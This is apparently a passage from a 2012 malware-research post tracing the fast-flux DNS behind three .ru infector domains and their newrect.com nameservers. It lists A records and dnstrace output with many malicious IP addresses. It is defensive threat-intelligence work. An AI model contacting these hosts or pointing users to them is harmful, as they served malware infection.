worgukiw.ru A 46.161.190.98
worgukiw.ru A 62.61.52.166
worgukiw.ru A 68.56.17.213
worgukiw.ru A 72.177.166.48
worgukiw.ru A 87.110.18.105
worgukiw.ru A 89.230.155.107
worgukiw.ru A 90.46.70.228
worgukiw.ru A 93.105.108.84
worgukiw.ru A 109.126.30.178
worgukiw.ru A 111.255.78.122
worgukiw.ru A 112.105.92.46
worgukiw.ru A 114.39.91.89
worgukiw.ru A 119.70.17.64
worgukiw.ru A 159.148.43.126
worgukiw.ru A 178.44.196.20
worgukiw.ru A 178.218.65.83
worgukiw.ru A 201.213.124.107
oqivynle.ru A 1.169.174.98
oqivynle.ru A 27.3.193.56
oqivynle.ru A 37.19.146.142
oqivynle.ru A 58.99.12.25
oqivynle.ru A 66.176.136.81
oqivynle.ru A 77.45.11.232
oqivynle.ru A 88.222.224.163
oqivynle.ru A 93.105.37.117
oqivynle.ru A 96.49.157.112
oqivynle.ru A 111.249.158.111
oqivynle.ru A 151.32.120.175
oqivynle.ru A 182.156.158.115
oqivynle.ru A 187.186.74.50
oqivynle.ru A 188.129.225.16ns1.newrect.com↑This registrar shall be put into subject of investigation. So let's analyze how these infector domains distributed by its evil DNS to their IP addresses. I am using two random DNS servers as- a start base of tracking its current NS record,
ns2.newrect.com
ns3.newrect.com
ns4.newrect.com
ns5.newrect.com
ns6.newrect.com@unixfreaxjp /malware]$ date
Mon Dec 31 04:10:26 JST 2012
@unixfreaxjp /malware]$ mydnstrace cucaklif.ru worgukiw.ru oqivynle.ru
Tracing to cucaklif.ru[a] via 202.238.95.24, maximum of 3 retries
202.238.95.24 (202.238.95.24)
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns6.newrect.com [cucaklif.ru] (46.118.84.205) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (98.203.119.95) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (62.178.200.113) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (84.232.243.160) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (14.98.225.76) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (1.169.82.215) Got authoritative answer
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns3.newrect.com [cucaklif.ru] (159.224.247.96) * Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (95.68.85.182) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (176.36.82.206) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (136.169.52.175) Got authoritative answer
| |\___ ns2.newrect.com [cucaklif.ru] (115.252.8.87) Got authoritative answer
| \___ ns1.newrect.com [cucaklif.ru] (87.110.84.205) Got authoritative answer
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns1.newrect.com [cucaklif.ru] (86.125.192.34) * * Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (79.115.4.61) Got authoritative answer
| |\___ ns3.newrect.com [cucaklif.ru] (60.196.154.12) Got authoritative answer
| |\___ ns4.newrect.com [cucaklif.ru] (124.43.156.174) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (66.63.125.247) Got authoritative answer
| \___ ns2.newrect.com [cucaklif.ru] (37.123.3.213) Got authoritative answer
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns2.newrect.com [cucaklif.ru] (46.98.30.104) Got authoritative answer
| |\___ ns6.newrect.com [cucaklif.ru] (218.37.77.170) Got authoritative answer
| |\___ ns1.newrect.com [cucaklif.ru] (114.26.132.112) * * *
| |\___ ns4.newrect.com [cucaklif.ru] (223.179.247.64) Got authoritative answer
| |\___ ns5.newrect.com [cucaklif.ru] (37.235.181.207) Got authoritative answer
| \___ ns3.newrect.com [cucaklif.ru] (111.119.184.27) * * *
\___ a.dns.ripn.net [ru] (193.232.128.6)
|\___ ns5.newrect.com [cucaklif.ru] (91.196.45.235) Got authoritative answer
|\___ ns3.newrect.com [cucaklif.ru] (195.254.182.197) Got authoritative answer
|\___ ns1.newrect.com [cucaklif.ru] (93.78.154.181) Got authoritative answer
|\___ ns4.newrect.com [cucaklif.ru] (50.150.25.163) Got authoritative answer
|\___ ns2.newrect.com [cucaklif.ru] (213.200.53.16) * * *
\___ ns6.newrect.com [cucaklif.ru] (89.41.42.216) Got authoritative answer
Tracing to worgukiw.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns3.newrect.com [worgukiw.ru] (188.190.5.185) Got authoritative answer
| |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) Got authoritative answer
| |\___ ns6.newrect.com [worgukiw.ru] (86.100.10.121) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (78.97.37.167) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (93.116.113.161) Got authoritative answer
| \___ ns5.newrect.com [worgukiw.ru] (111.88.6.136) *
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns4.newrect.com [worgukiw.ru] (46.250.124.196) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (87.110.88.204) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (95.46.206.59) Got authoritative answer
| |\___ ns6.newrect.com [worgukiw.ru] (50.130.45.53) *
| |\___ ns5.newrect.com [worgukiw.ru] (94.244.177.63) Got authoritative answer
| \___ ns3.newrect.com [worgukiw.ru] (117.226.27.200) Got authoritative answer
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns1.newrect.com [worgukiw.ru] (111.67.75.93) *
| |\___ ns5.newrect.com [worgukiw.ru] (37.99.24.241) *
| |\___ ns3.newrect.com [worgukiw.ru] (49.205.243.189) *
| |\___ ns4.newrect.com [worgukiw.ru] (95.209.170.44) Got authoritative answer
| |\___ ns2.newrect.com [worgukiw.ru] (175.180.77.31) *
| \___ ns6.newrect.com [worgukiw.ru] (188.124.119.193) Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns5.newrect.com [worgukiw.ru] (109.94.108.114) Got authoritative answer
| |\___ ns1.newrect.com [worgukiw.ru] (176.240.146.178) Got authoritative answer
| |\___ ns4.newrect.com [worgukiw.ru] (71.192.243.34) (cached)
| |\___ ns3.newrect.com [worgukiw.ru] (180.149.218.65) *
| |\___ ns2.newrect.com [worgukiw.ru] (91.196.45.235) Got authoritative answer
| \___ ns6.newrect.com [worgukiw.ru] (109.169.207.220) Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
\___ e.dns.ripn.net [ru] (193.232.142.17)
|\___ ns2.newrect.com [worgukiw.ru] (95.200.166.236) Got authoritative answer
|\___ ns6.newrect.com [worgukiw.ru] (195.254.182.197) Got authoritative answer
|\___ ns4.newrect.com [worgukiw.ru] (82.212.128.63) Got authoritative answer
|\___ ns3.newrect.com [worgukiw.ru] (218.173.22.77) *
|\___ ns1.newrect.com [worgukiw.ru] (178.148.145.215) *
\___ ns5.newrect.com [worgukiw.ru] (111.254.17.110) Got authoritative answer
Tracing to oqivynle.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns1.newrect.com [oqivynle.ru] (89.148.107.194) Got authoritative answer
| |\___ ns6.newrect.com [oqivynle.ru] (89.200.147.156) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (87.207.101.220) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (95.57.146.216) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (118.35.96.145) Got authoritative answer
| \___ ns3.newrect.com [oqivynle.ru] (89.228.55.91) Got authoritative answer
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns5.newrect.com [oqivynle.ru] (89.43.191.93) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (82.211.161.239) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (92.240.37.150) Got authoritative answer
| |\___ ns1.newrect.com [oqivynle.ru] (178.150.227.84) Got authoritative answer
| |\___ ns3.newrect.com [oqivynle.ru] (118.35.96.145) (cached)
| \___ ns6.newrect.com [oqivynle.ru] (84.205.30.45) Got authoritative answer
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns4.newrect.com [oqivynle.ru] (178.52.52.126) *
| |\___ ns3.newrect.com [oqivynle.ru] (60.196.154.12) Got authoritative answer
| |\___ ns6.newrect.com [oqivynle.ru] (31.11.86.91) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (178.210.153.47) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (89.191.165.117) Got authoritative answer
| \___ ns1.newrect.com [oqivynle.ru] (188.26.249.96) Got authoritative answer
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
|\___ f.dns.ripn.net [ru] (193.232.156.17)
| |\___ ns6.newrect.com [oqivynle.ru] (212.160.231.215) Got authoritative answer
| |\___ ns4.newrect.com [oqivynle.ru] (86.106.92.7) Got authoritative answer
| |\___ ns5.newrect.com [oqivynle.ru] (5.105.62.233) Got authoritative answer
| |\___ ns3.newrect.com [oqivynle.ru] (46.109.99.63) Got authoritative answer
| |\___ ns2.newrect.com [oqivynle.ru] (91.190.57.250) Got authoritative answer
| \___ ns1.newrect.com [oqivynle.ru] (95.84.197.10) Got authoritative answer
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
\___ d.dns.ripn.net [ru] (194.190.124.17)
|\___ ns6.newrect.com [oqivynle.ru] (197.159.13.140) *
|\___ ns2.newrect.com [oqivynle.ru] (86.100.148.17) Got authoritative answer
|\___ ns1.newrect.com [oqivynle.ru] (46.172.100.70) Got authoritative answer
|\___ ns3.newrect.com [oqivynle.ru] (109.239.41.28) Got authoritative answer
|\___ ns5.newrect.com [oqivynle.ru] (46.109.125.151) *
\___ ns4.newrect.com [oqivynle.ru] (91.196.45.235) Got authoritative answer
#MalwareMustDie - Happy New Year to friends & crusaders!